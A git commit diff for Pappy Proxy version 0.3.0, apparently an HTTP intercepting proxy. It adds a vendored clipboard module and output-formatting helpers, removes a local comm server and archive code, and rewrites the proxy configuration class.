Version 0.3.0: move a large amount of code to Puppy

Rob Glew 2017-06-29 13:08:20 -07:00
parent 76d20774a5
commit f9737dbdd8
169 changed files with 6463 additions and 43862 deletions

1
pappyproxy/.coverage Normal file

File diff suppressed because one or more lines are too long

View file

@@ -1,3 +0,0 @@
[run]
omit = tests/*, schema/*, plugins/*, templates/*

View file

@@ -1,22 +0,0 @@
install-third-party:
pip install -e ..
test:
py.test -rw --twisted --cov-config .coveragerc --cov=. tests/
test-verbose:
py.test -v -rw --twisted --cov-config .coveragerc --cov-report term-missing --cov=. tests/
test-macros:
py.test -v -rw --twisted tests/test_macros.py
test-proxy:
py.test -v -rw --twisted tests/test_proxy.py
test-comm:
py.test -v -rw --twisted tests/test_comm.py
test-crypto:
py.test -v -rw --twisted tests/test_crypto.py

View file

@@ -1 +0,0 @@
__version__ = '0.2.13'

View file

@@ -1,7 +0,0 @@
import pappy
from twisted.internet import reactor
if __name__ == '__main__':
reactor.callWhenRunning(pappy.main)
reactor.run()

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

386
pappyproxy/clip.py Normal file
View file

@@ -0,0 +1,386 @@
"""
Copyright (c) 2014, Al Sweigart
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the {organization} nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import contextlib
import ctypes
import os
import platform
import subprocess
import sys
import time
from ctypes import c_size_t, sizeof, c_wchar_p, get_errno, c_wchar
EXCEPT_MSG = """
Pyperclip could not find a copy/paste mechanism for your system.
For more information, please visit https://pyperclip.readthedocs.org """
PY2 = sys.version_info[0] == 2
text_type = unicode if PY2 else str
class PyperclipException(RuntimeError):
pass
class PyperclipWindowsException(PyperclipException):
def __init__(self, message):
message += " (%s)" % ctypes.WinError()
super(PyperclipWindowsException, self).__init__(message)
def init_osx_clipboard():
def copy_osx(text):
p = subprocess.Popen(['pbcopy', 'w'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_osx():
p = subprocess.Popen(['pbpaste', 'r'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_osx, paste_osx
def init_gtk_clipboard():
import gtk
def copy_gtk(text):
global cb
cb = gtk.Clipboard()
cb.set_text(text)
cb.store()
def paste_gtk():
clipboardContents = gtk.Clipboard().wait_for_text()
# for python 2, returns None if the clipboard is blank.
if clipboardContents is None:
return ''
else:
return clipboardContents
return copy_gtk, paste_gtk
def init_qt_clipboard():
# $DISPLAY should exist
from PyQt4.QtGui import QApplication
app = QApplication([])
def copy_qt(text):
cb = app.clipboard()
cb.setText(text)
def paste_qt():
cb = app.clipboard()
return text_type(cb.text())
return copy_qt, paste_qt
def init_xclip_clipboard():
def copy_xclip(text):
p = subprocess.Popen(['xclip', '-selection', 'c'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_xclip():
p = subprocess.Popen(['xclip', '-selection', 'c', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_xclip, paste_xclip
def init_xsel_clipboard():
def copy_xsel(text):
p = subprocess.Popen(['xsel', '-b', '-i'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_xsel():
p = subprocess.Popen(['xsel', '-b', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_xsel, paste_xsel
def init_klipper_clipboard():
def copy_klipper(text):
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'setClipboardContents',
text],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=None)
def paste_klipper():
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'getClipboardContents'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
# Workaround for https://bugs.kde.org/show_bug.cgi?id=342874
# TODO: https://github.com/asweigart/pyperclip/issues/43
clipboardContents = stdout.decode()
# even if blank, Klipper will append a newline at the end
assert len(clipboardContents) > 0
# make sure that newline is there
assert clipboardContents.endswith('\n')
if clipboardContents.endswith('\n'):
clipboardContents = clipboardContents[:-1]
return clipboardContents
return copy_klipper, paste_klipper
def init_no_clipboard():
class ClipboardUnavailable(object):
def __call__(self, *args, **kwargs):
raise PyperclipException(EXCEPT_MSG)
if PY2:
def __nonzero__(self):
return False
else:
def __bool__(self):
return False
return ClipboardUnavailable(), ClipboardUnavailable()
class CheckedCall(object):
def __init__(self, f):
super(CheckedCall, self).__setattr__("f", f)
def __call__(self, *args):
ret = self.f(*args)
if not ret and get_errno():
raise PyperclipWindowsException("Error calling " + self.f.__name__)
return ret
def __setattr__(self, key, value):
setattr(self.f, key, value)
def init_windows_clipboard():
from ctypes.wintypes import (HGLOBAL, LPVOID, DWORD, LPCSTR, INT, HWND,
HINSTANCE, HMENU, BOOL, UINT, HANDLE)
windll = ctypes.windll
safeCreateWindowExA = CheckedCall(windll.user32.CreateWindowExA)
safeCreateWindowExA.argtypes = [DWORD, LPCSTR, LPCSTR, DWORD, INT, INT,
INT, INT, HWND, HMENU, HINSTANCE, LPVOID]
safeCreateWindowExA.restype = HWND
safeDestroyWindow = CheckedCall(windll.user32.DestroyWindow)
safeDestroyWindow.argtypes = [HWND]
safeDestroyWindow.restype = BOOL
OpenClipboard = windll.user32.OpenClipboard
OpenClipboard.argtypes = [HWND]
OpenClipboard.restype = BOOL
safeCloseClipboard = CheckedCall(windll.user32.CloseClipboard)
safeCloseClipboard.argtypes = []
safeCloseClipboard.restype = BOOL
safeEmptyClipboard = CheckedCall(windll.user32.EmptyClipboard)
safeEmptyClipboard.argtypes = []
safeEmptyClipboard.restype = BOOL
safeGetClipboardData = CheckedCall(windll.user32.GetClipboardData)
safeGetClipboardData.argtypes = [UINT]
safeGetClipboardData.restype = HANDLE
safeSetClipboardData = CheckedCall(windll.user32.SetClipboardData)
safeSetClipboardData.argtypes = [UINT, HANDLE]
safeSetClipboardData.restype = HANDLE
safeGlobalAlloc = CheckedCall(windll.kernel32.GlobalAlloc)
safeGlobalAlloc.argtypes = [UINT, c_size_t]
safeGlobalAlloc.restype = HGLOBAL
safeGlobalLock = CheckedCall(windll.kernel32.GlobalLock)
safeGlobalLock.argtypes = [HGLOBAL]
safeGlobalLock.restype = LPVOID
safeGlobalUnlock = CheckedCall(windll.kernel32.GlobalUnlock)
safeGlobalUnlock.argtypes = [HGLOBAL]
safeGlobalUnlock.restype = BOOL
GMEM_MOVEABLE = 0x0002
CF_UNICODETEXT = 13
@contextlib.contextmanager
def window():
"""
Context that provides a valid Windows hwnd.
"""
# we really just need the hwnd, so setting "STATIC"
# as predefined lpClass is just fine.
hwnd = safeCreateWindowExA(0, b"STATIC", None, 0, 0, 0, 0, 0,
None, None, None, None)
try:
yield hwnd
finally:
safeDestroyWindow(hwnd)
@contextlib.contextmanager
def clipboard(hwnd):
"""
Context manager that opens the clipboard and prevents
other applications from modifying the clipboard content.
"""
# We may not get the clipboard handle immediately because
# some other application is accessing it (?)
# We try for at least 500ms to get the clipboard.
t = time.time() + 0.5
success = False
while time.time() < t:
success = OpenClipboard(hwnd)
if success:
break
time.sleep(0.01)
if not success:
raise PyperclipWindowsException("Error calling OpenClipboard")
try:
yield
finally:
safeCloseClipboard()
def copy_windows(text):
# This function is heavily based on
# http://msdn.com/ms649016#_win32_Copying_Information_to_the_Clipboard
with window() as hwnd:
# http://msdn.com/ms649048
# If an application calls OpenClipboard with hwnd set to NULL,
# EmptyClipboard sets the clipboard owner to NULL;
# this causes SetClipboardData to fail.
# => We need a valid hwnd to copy something.
with clipboard(hwnd):
safeEmptyClipboard()
if text:
# http://msdn.com/ms649051
# If the hMem parameter identifies a memory object,
# the object must have been allocated using the
# function with the GMEM_MOVEABLE flag.
count = len(text) + 1
handle = safeGlobalAlloc(GMEM_MOVEABLE,
count * sizeof(c_wchar))
locked_handle = safeGlobalLock(handle)
ctypes.memmove(c_wchar_p(locked_handle), c_wchar_p(text), count * sizeof(c_wchar))
safeGlobalUnlock(handle)
safeSetClipboardData(CF_UNICODETEXT, handle)
def paste_windows():
with clipboard(None):
handle = safeGetClipboardData(CF_UNICODETEXT)
if not handle:
# GetClipboardData may return NULL with errno == NO_ERROR
# if the clipboard is empty.
# (Also, it may return a handle to an empty buffer,
# but technically that's not empty)
return ""
return c_wchar_p(handle).value
return copy_windows, paste_windows
# `import PyQt4` sys.exit()s if DISPLAY is not in the environment.
# Thus, we need to detect the presence of $DISPLAY manually
# and not load PyQt4 if it is absent.
HAS_DISPLAY = os.getenv("DISPLAY", False)
CHECK_CMD = "where" if platform.system() == "Windows" else "which"
def _executable_exists(name):
return subprocess.call([CHECK_CMD, name],
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def determine_clipboard():
# Determine the OS/platform and set
# the copy() and paste() functions accordingly.
if 'cygwin' in platform.system().lower():
# FIXME: pyperclip currently does not support Cygwin,
# see https://github.com/asweigart/pyperclip/issues/55
pass
elif os.name == 'nt' or platform.system() == 'Windows':
return init_windows_clipboard()
if os.name == 'mac' or platform.system() == 'Darwin':
return init_osx_clipboard()
if HAS_DISPLAY:
# Determine which command/module is installed, if any.
try:
import gtk # check if gtk is installed
except ImportError:
pass
else:
return init_gtk_clipboard()
try:
import PyQt4 # check if PyQt4 is installed
except ImportError:
pass
else:
return init_qt_clipboard()
if _executable_exists("xclip"):
return init_xclip_clipboard()
if _executable_exists("xsel"):
return init_xsel_clipboard()
if _executable_exists("klipper") and _executable_exists("qdbus"):
return init_klipper_clipboard()
return init_no_clipboard()
def set_clipboard(clipboard):
global copy, paste
clipboard_types = {'osx': init_osx_clipboard,
'gtk': init_gtk_clipboard,
'qt': init_qt_clipboard,
'xclip': init_xclip_clipboard,
'xsel': init_xsel_clipboard,
'klipper': init_klipper_clipboard,
'windows': init_windows_clipboard,
'no': init_no_clipboard}
copy, paste = clipboard_types[clipboard]()
copy, paste = determine_clipboard()
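
The module's public surface reduces to the two callables bound at import time by determine_clipboard(). A minimal usage sketch, assuming the module is importable as pappyproxy.clip (the import path is the only assumption here):

# Usage sketch for the vendored clipboard module above.
from pappyproxy import clip

try:
    clip.copy("hello from pappy")   # routed to pbcopy/xclip/xsel/Win32/... as detected
    print(clip.paste())             # round-trips through the system clipboard
except clip.PyperclipException:
    # Raised by the ClipboardUnavailable fallback when no mechanism was found
    print("no copy/paste mechanism available")

# A specific backend can also be forced, e.g. on X11 with xclip installed:
# clip.set_clipboard('xclip')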

View file

@@ -1,6 +1,12 @@
import re
import itertools
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
from pygments.lexers import get_lexer_for_mimetype, HttpLexer
from pygments.formatters import TerminalFormatter
def clen(s):
ansi_escape = re.compile(r'\x1b[^m]*m')
return len(ansi_escape.sub('', s))
@@ -96,20 +102,96 @@ def path_formatter(path, width=-1):
colparts.append(c+p+Colors.ENDC)
return '/'.join(colparts)
def host_color(host):
def color_string(s, color_only=False):
"""
Return the string wrapped in a color/ENDC pair. The same string will always get the same color.
"""
from .util import str_hash_code
# Give each unique host a different color (ish)
if not host:
return Colors.RED
hostcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
return hostcols[hash(host)%(len(hostcols)-1)]
if not s:
return ""
strcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
col = strcols[str_hash_code(s)%(len(strcols)-1)]
if color_only:
return col
else:
return col + s + Colors.ENDC
def pretty_msg(msg):
to_ret = pretty_headers(msg) + '\r\n' + pretty_body(msg)
return to_ret
def pretty_headers(msg):
to_ret = msg.headers_section()
to_ret = highlight(to_ret, HttpLexer(), TerminalFormatter())
return to_ret
def pretty_body(msg):
from .util import printable_data
to_ret = printable_data(msg.body, colors=False)
if 'content-type' in msg.headers:
try:
lexer = get_lexer_for_mimetype(msg.headers.get('content-type').split(';')[0])
to_ret = highlight(to_ret, lexer, TerminalFormatter())
except Exception:
pass
return to_ret
def url_formatter(req, colored=False, always_have_path=False, explicit_path=False, explicit_port=False):
retstr = ''
if not req.use_tls:
if colored:
retstr += Colors.RED
retstr += 'http'
if colored:
retstr += Colors.ENDC
retstr += '://'
else:
retstr += 'https://'
if colored:
retstr += color_string(req.dest_host)
else:
retstr += req.dest_host
if not ((req.use_tls and req.dest_port == 443) or \
(not req.use_tls and req.dest_port == 80) or \
explicit_port):
if colored:
retstr += ':'
retstr += Colors.MAGENTA
retstr += str(req.dest_port)
retstr += Colors.ENDC
else:
retstr += ':{}'.format(req.dest_port)
if (req.url.path and req.url.path != '/') or always_have_path:
if colored:
retstr += path_formatter(req.url.path)
else:
retstr += req.url.path
if req.url.params:
retstr += '?'
params = req.url.params.split("&")
pairs = [tuple(param.split("=")) for param in params]
paramstrs = []
for k, v in pairs:
if colored:
paramstrs.append((Colors.GREEN + '{}' + Colors.ENDC + '=' + Colors.LGREEN + '{}' + Colors.ENDC).format(k, v))
else:
paramstrs.append('{}={}'.format(k, v))
retstr += '&'.join(paramstrs)
if req.url.fragment:
retstr += '#%s' % req.url.fragment
return retstr
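
pretty_body() above is a thin wrapper over pygments: pick a lexer from the Content-Type, fall back silently if none exists. The same pattern in isolation (the mimetype and body below are illustrative, not taken from the commit):

# Standalone sketch of the lexer-by-mimetype pattern used in pretty_body().
from pygments import highlight
from pygments.lexers import get_lexer_for_mimetype
from pygments.formatters import TerminalFormatter
from pygments.util import ClassNotFound

def colorize_body(body, content_type):
    # Drop parameters such as "; charset=utf-8" before the lookup
    mimetype = content_type.split(';')[0].strip()
    try:
        lexer = get_lexer_for_mimetype(mimetype)
    except ClassNotFound:
        return body  # unknown type: leave the body unhighlighted
    return highlight(body, lexer, TerminalFormatter())

print(colorize_body('{"user": "admin"}', 'application/json; charset=utf-8'))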

View file

@@ -1,112 +0,0 @@
import sys
import base64
import json
from twisted.protocols.basic import LineReceiver
from twisted.internet import defer
from util import PappyException
"""
comm.py
Handles creating a listening server bound to localhost that other processes can
use to interact with the proxy.
"""
debug = False
class CommServer(LineReceiver):
MAX_LENGTH=sys.maxint
def __init__(self):
self.delimiter = '\n'
self.action_handlers = {
'ping': self.action_ping,
'get_request': self.action_get_request,
'get_response': self.action_get_response,
'submit': self.action_submit_request,
}
def lineReceived(self, line):
line = line.strip()
if line == '':
return
#try:
command_data = json.loads(line)
command = command_data['action']
valid = False
if command in self.action_handlers:
valid = True
result = {'success': True}
func_defer = self.action_handlers[command](command_data)
func_defer.addCallback(self.action_result_handler, result)
func_defer.addErrback(self.action_error_handler, result)
if not valid:
raise PappyException('%s is an invalid command' % command_data['action'])
# except PappyException as e:
# return_data = {'success': False, 'message': str(e)}
# self.sendLine(json.dumps(return_data))
def action_result_handler(self, data, result):
result.update(data)
self.sendLine(json.dumps(result))
def action_error_handler(self, error, result):
if debug:
print error.getTraceback()
return_data = {'success': False, 'message': str(error.getTraceback())}
result.update(result)
error.trap(Exception)
self.sendLine(json.dumps(return_data))
return True
def action_ping(self, data):
return defer.succeed({'ping': 'pong'})
@defer.inlineCallbacks
def action_get_request(self, data):
from .http import Request
try:
reqid = data['reqid']
req = yield Request.load_request(reqid)
except KeyError:
raise PappyException("Request with given ID does not exist")
dat = json.loads(req.to_json())
defer.returnValue(dat)
@defer.inlineCallbacks
def action_get_response(self, data):
from .http import Request, Response
try:
reqid = data['reqid']
req = yield Request.load_request(reqid)
except KeyError:
raise PappyException("Request with given ID does not exist, cannot fetch associated response.")
if req.response:
rsp = req.response
dat = json.loads(rsp.to_json())
else:
dat = {}
defer.returnValue(dat)
@defer.inlineCallbacks
def action_submit_request(self, data):
from .http import Request
from .plugin import active_intercepting_macros
message = base64.b64decode(data['full_message'])
req = Request(message)
req.host = data['host'].encode('utf-8')
req.port = data['port']
req.is_ssl = data['is_ssl']
yield req.async_submit(mangle=True)
if 'tags' in data:
req.tags = set(data['tags'])
yield req.async_deep_save()
retdata = {}
retdata['request'] = json.loads(req.to_json())
if req.response:
retdata['response'] = json.loads(req.response.to_json())
defer.returnValue(retdata)
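
The protocol comm.py removes here is newline-delimited JSON: each request line carries an 'action' key, and every reply merges the handler's result into a 'success' flag. A minimal blocking client sketch (the port 8081 is illustrative; use whatever port CommServer was bound to):

# Client sketch for the newline-delimited JSON protocol above.
import json
import socket

def comm_request(port, action, **fields):
    msg = dict(fields, action=action)
    with socket.create_connection(('127.0.0.1', port)) as s:
        s.sendall((json.dumps(msg) + '\n').encode('utf-8'))
        buf = b''
        while not buf.endswith(b'\n'):   # read until the reply line terminator
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return json.loads(buf.decode('utf-8'))

print(comm_request(8081, 'ping'))   # expected: {'success': True, 'ping': 'pong'}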

View file

@@ -1,84 +0,0 @@
#!/usr/bin/env python
import crochet
import glob
import pappyproxy
import zipfile
import tarfile
try:
import bz2
except ImportError:
bz2 = None
print "BZ2 not installed on your system"
from base64 import b64encode, b64decode
from os import getcwd, sep, path, urandom
from .util import PappyException
class Compress(object):
def __init__(self, sessconfig):
self.config = sessconfig
self.zip_archive = sessconfig.archive
self.bz2_archive = sessconfig.archive
def compress_project(self):
if bz2:
self.tar_project()
else:
self.zip_project()
def decompress_project(self):
if bz2:
self.untar_project()
else:
self.unzip_project()
def zip_project(self):
"""
Zip project files
Using append mode (mode='a') will create a zip archive
if none exists in the project.
"""
try:
zf = zipfile.ZipFile(self.zip_archive, mode="a")
zf.write(self.config.crypt_dir)
zf.close()
except zipfile.LargeZipFile as e:
raise PappyException("Project zipfile too large. Error: ", e)
def unzip_project(self):
"""
Extract project files from decrypted zip archive.
Initially checks the zip archive's magic number and
attempts to extract pappy.json to validate integrity
of the zipfile.
"""
if not zipfile.is_zipfile(self.zip_archive):
raise PappyException("Project archive corrupted.")
zf = zipfile.ZipFile(self.zip_archive)
try:
zf.extract("config.json")
except zipfile.BadZipfile as e:
raise PappyException("Zip archive corrupted. Error: ", e)
zf.extractall()
def tar_project(self):
archive = tarfile.open(self.bz2_archive, 'w:bz2')
archive.add(self.config.crypt_dir)
archive.close()
def untar_project(self):
if tarfile.is_tarfile(self.bz2_archive):
# Raise exception if there is a failure
try:
with tarfile.open(self.bz2_archive, "r:bz2") as archive:
archive.extractall()
except tarfile.ExtractError as e:
raise PappyException("Tar archive corrupted. Error: ", e)

View file

@@ -1,289 +1,129 @@
import glob
import copy
import json
import os
import shutil
class PappyConfig(object):
"""
The configuration settings for the proxy. To access the config object for the
current session (eg from plugins) use ``pappyproxy.pappy.session.config``.
.. data:: cert_dir
The location of the CA certs that Pappy will use. This can be configured in the
``config.json`` file for a project.
:Default: ``{DATADIR}/certs``
.. data:: pappy_dir
The directory where Pappy's scripts are located. Don't write anything here; you
almost certainly don't need to. Use DATA_DIR instead.
:Default: Wherever the scripts are installed
.. data:: data_dir
The data directory. This is where files that have to be read by Pappy every time
it's run are put. For example, plugins are stored in ``{DATADIR}/plugins`` and
certs are by default stored in ``{DATADIR}/certs``. This defaults to ``~/.pappy``
and isn't configurable right now.
:Default: ``~/.pappy``
.. data:: datafile
The name of the data file where requests and responses are stored. This can be
configured in the ``config.json`` file for a project.
:Default: ``data.db``
.. data:: debug_dir
The directory to write debug output to. Don't put this outside the project folder
since it writes all the request data to this directory. You probably won't need
to use this. Configured in the ``config.json`` file for the project.
:Default: None
.. data:: listeners
The list of active listeners. It is a list of dictionaries of the form `{"port": 8000, "interface": "127.0.0.1"}`
Not modifiable after startup. Configured in the ``config.json`` file for the project.
:Default: ``[]``
.. data:: socks_proxy
Details for a SOCKS proxy. It is a dict with the following key/values::
host: The SOCKS proxy host
port: The proxy port
username: Username (optional)
password: Password (optional)
If null, no proxy will be used.
:Default: ``null``
.. data:: http_proxy
default_config = """{
"listeners": [
{"iface": "127.0.0.1", "port": 8080}
],
"proxy": {"use_proxy": false, "host": "", "port": 0, "is_socks": false}
}"""
Details for an upstream HTTP proxy. It is a dict with the following key/values::
host: The proxy host
port: The proxy port
username: Username (optional)
password: Password (optional)
If null, no proxy will be used.
.. data:: plugin_dirs
class ProxyConfig:
List of directories that plugins are loaded from. Not modifiable.
:Default: ``['{DATA_DIR}/plugins', '{PAPPY_DIR}/plugins']``
.. data:: save_history
Whether command history should be saved to a file/loaded at startup.
:Default: True
.. data:: config_dict
The dictionary read from config.json. When writing plugins, use this to load
configuration options for your plugin.
.. data:: global_config_dict
The dictionary from ~/.pappy/global_config.json. It contains settings for
Pappy that are specific to the current computer. Avoid putting settings here,
especially if it involves specific projects.
.. data:: archive
Project archive compressed as a ``tar.bz2`` archive if libraries available on the system,
otherwise falls back to zip archive.
:Default: ``project.archive``
.. data:: crypt_dir
Temporary working directory to unpack an encrypted project archive. Directory
will contain copies of normal startup files, e.g. config.json, cmdhistory, etc.
On exiting pappy, entire directory will be compressed into an archive and encrypted.
Compressed as a tar.bz2 archive if libraries available on the system,
otherwise falls back to zip.
:Default: ``crypt``
.. data:: crypt_file
Encrypted archive of the temporary working directory ``crypt_dir``. Compressed as a
tar.bz2 archive if libraries available on the system, otherwise falls back to zip.
:Default: ``project.crypt``
.. data:: crypt_session
Boolean variable to determine whether pappy started in crypto mode
:Default: False
.. data:: salt_len
Length of the nonce-salt value appended to the end of `crypt_file`
:Default: 16
"""
def __init__(self):
self.pappy_dir = os.path.dirname(os.path.realpath(__file__))
self.data_dir = os.path.join(os.path.expanduser('~'), '.pappy')
self.cert_dir = os.path.join(self.data_dir, 'certs')
self.datafile = 'data.db'
self.debug_dir = None
self.debug_to_file = False
self.debug_verbosity = 0
self.listeners = []
self.socks_proxy = None
self.http_proxy = None
self.ssl_ca_file = 'certificate.crt'
self.ssl_pkey_file = 'private.key'
self.histsize = 1000
self.plugin_dirs = [os.path.join(self.data_dir, 'plugins'), os.path.join(self.pappy_dir, 'plugins')]
self.config_dict = {}
self.global_config_dict = {}
self.archive = 'project.archive'
self.debug = False
self.crypt_dir = 'crypt'
self.crypt_file = 'project.crypt'
self.crypt_session = False
self.salt_len = 16
def get_default_config(self):
default_config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'default_user_config.json')
with open(default_config_file) as f:
settings = json.load(f)
return settings
def get_project_files(self):
file_glob = glob.glob('*')
pp = os.getcwd() + os.sep
project_files = [pp+f for f in file_glob if os.path.isfile(pp+f)]
if self.crypt_file in project_files:
project_files.remove(self.crypt_file)
return project_files
self._listeners = [('127.0.0.1', 8080, None)]
self._proxy = {'use_proxy': False, 'host': '', 'port': 0, 'is_socks': False}
def load(self, fname):
try:
with open(fname, 'r') as f:
config_info = json.loads(f.read())
except IOError:
config_info = json.loads(default_config)
with open(fname, 'w') as f:
f.write(default_config)
# Listeners
if 'listeners' in config_info:
self._parse_listeners(config_info['listeners'])
@staticmethod
def _parse_proxy_login(conf):
proxy = {}
if 'host' in conf and 'port' in conf:
proxy = {}
proxy['host'] = conf['host'].encode('utf-8')
proxy['port'] = conf['port']
if 'username' in conf:
if 'password' in conf:
proxy['username'] = conf['username'].encode('utf-8')
proxy['password'] = conf['password'].encode('utf-8')
else:
print 'Proxy has a username but no password. Ignoring creds.'
else:
print 'Proxy config is missing host/port.'
return None
return proxy
def load_settings(self, proj_config):
# Substitution dictionary
subs = {}
subs['PAPPYDIR'] = self.pappy_dir
subs['DATADIR'] = self.data_dir
# Data file settings
if 'data_file' in proj_config:
self.datafile = proj_config["data_file"].format(**subs)
# Debug settings
if 'debug_dir' in proj_config:
if proj_config['debug_dir']:
self.debug_to_file = True
self.debug_dir = proj_config["debug_dir"].format(**subs)
# Cert directory settings
if 'cert_dir' in proj_config:
self.cert_dir = proj_config["cert_dir"].format(**subs)
# Listener settings
if "proxy_listeners" in proj_config:
self.listeners = []
for l in proj_config["proxy_listeners"]:
if 'forward_host_ssl' in l:
l['forward_host_ssl'] = l['forward_host_ssl'].encode('utf-8')
if 'forward_host' in l:
l['forward_host'] = l['forward_host'].encode('utf-8')
self.listeners.append(l)
# SOCKS proxy settings
self.socks_proxy = None
if "socks_proxy" in proj_config:
if proj_config['socks_proxy'] is not None:
self.socks_proxy = PappyConfig._parse_proxy_login(proj_config['socks_proxy'])
if 'proxy' in config_info:
self._proxy = config_info['proxy']
# HTTP proxy settings
self.http_proxy = None
if "http_proxy" in proj_config:
if proj_config['http_proxy'] is not None:
self.http_proxy = PappyConfig._parse_proxy_login(proj_config['http_proxy'])
def _parse_listeners(self, listeners):
self._listeners = []
for info in listeners:
if 'port' in info:
port = info['port']
else:
port = 8080
if 'interface' in info:
iface = info['interface']
elif 'iface' in info:
iface = info['iface']
else:
iface = '127.0.0.1'
if "transparent" in info:
trans_info = info['transparent']
transparent_dest = (trans_info.get('host', ""),
trans_info.get('port', 0),
trans_info.get('use_tls', False))
else:
transparent_dest = None
self._listeners.append((iface, port, transparent_dest))
@property
def listeners(self):
return copy.deepcopy(self._listeners)
# History saving settings
if "history_size" in proj_config:
self.histsize = proj_config['history_size']
def load_global_settings(self, global_config):
from .http import Request
if "cache_size" in global_config:
self.cache_size = global_config['cache_size']
else:
self.cache_size = 2000
Request.cache.resize(self.cache_size)
def load_from_file(self, fname):
# Make sure we have a config file
if not os.path.isfile(fname):
print "Copying default config to %s" % fname
default_config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'default_user_config.json')
shutil.copyfile(default_config_file, fname)
# Load local project config
with open(fname, 'r') as f:
self.config_dict = json.load(f)
self.load_settings(self.config_dict)
def global_load_from_file(self):
# Make sure we have a config file
fname = os.path.join(self.data_dir, 'global_config.json')
if not os.path.isfile(fname):
print "Copying default global config to %s" % fname
default_global_config_file = os.path.join(self.pappy_dir,
'default_global_config.json')
shutil.copyfile(default_global_config_file, fname)
# Load local project config
with open(fname, 'r') as f:
self.global_config_dict = json.load(f)
self.load_global_settings(self.global_config_dict)
@listeners.setter
def listeners(self, val):
self._parse_listeners(val)
@property
def proxy(self):
# don't use this, use the getters to get the parsed values
return self._proxy
@proxy.setter
def proxy(self, val):
self._proxy = val
@property
def use_proxy(self):
if self._proxy is None:
return False
if 'use_proxy' in self._proxy:
if self._proxy['use_proxy']:
return True
return False
@property
def proxy_host(self):
if self._proxy is None:
return ''
if 'host' in self._proxy:
return self._proxy['host']
return ''
@property
def proxy_port(self):
if self._proxy is None:
return ''
if 'port' in self._proxy:
return self._proxy['port']
return ''
@property
def proxy_username(self):
if self._proxy is None:
return ''
if 'username' in self._proxy:
return self._proxy['username']
return ''
@property
def proxy_password(self):
if self._proxy is None:
return ''
if 'password' in self._proxy:
return self._proxy['password']
return ''
@property
def use_proxy_creds(self):
return ('username' in self._proxy or 'password' in self._proxy)
@property
def is_socks_proxy(self):
if self._proxy is None:
return False
if 'is_socks' in self._proxy:
if self._proxy['is_socks']:
return True
return False
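
The new ProxyConfig boils configuration down to two parsed pieces: a list of (interface, port, transparent_dest) listener tuples and a proxy dict exposed through typed properties. A usage sketch, assuming the interleaved __init__ lines above set the defaults shown:

# Usage sketch for the new ProxyConfig; the file name is illustrative.
config = ProxyConfig()
config.load('config.json')   # falls back to default_config and writes it out

for iface, port, transparent_dest in config.listeners:
    print('listening on %s:%d (transparent dest: %r)' % (iface, port, transparent_dest))

if config.use_proxy:
    kind = 'SOCKS' if config.is_socks_proxy else 'HTTP'
    print('upstream %s proxy at %s:%s' % (kind, config.proxy_host, config.proxy_port))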

View file

@@ -7,50 +7,80 @@ import atexit
import cmd2
import os
import readline
import string
#import string
import shlex
import sys
from .util import PappyException
from .colors import Colors
from .proxy import MessageError
###################
## Helper functions
## Helper Functions
def print_pappy_errors(func):
def print_errors(func):
def catch(*args, **kwargs):
try:
func(*args, **kwargs)
except PappyException as e:
print str(e)
except (CommandError, MessageError) as e:
print(str(e))
return catch
def interface_loop(client):
cons = Cmd(client=client)
load_interface(cons)
sys.argv = []
cons.cmdloop()
def load_interface(cons):
from .interface import test, view, decode, misc, context, mangle, macros, tags
test.load_cmds(cons)
view.load_cmds(cons)
decode.load_cmds(cons)
misc.load_cmds(cons)
context.load_cmds(cons)
mangle.load_cmds(cons)
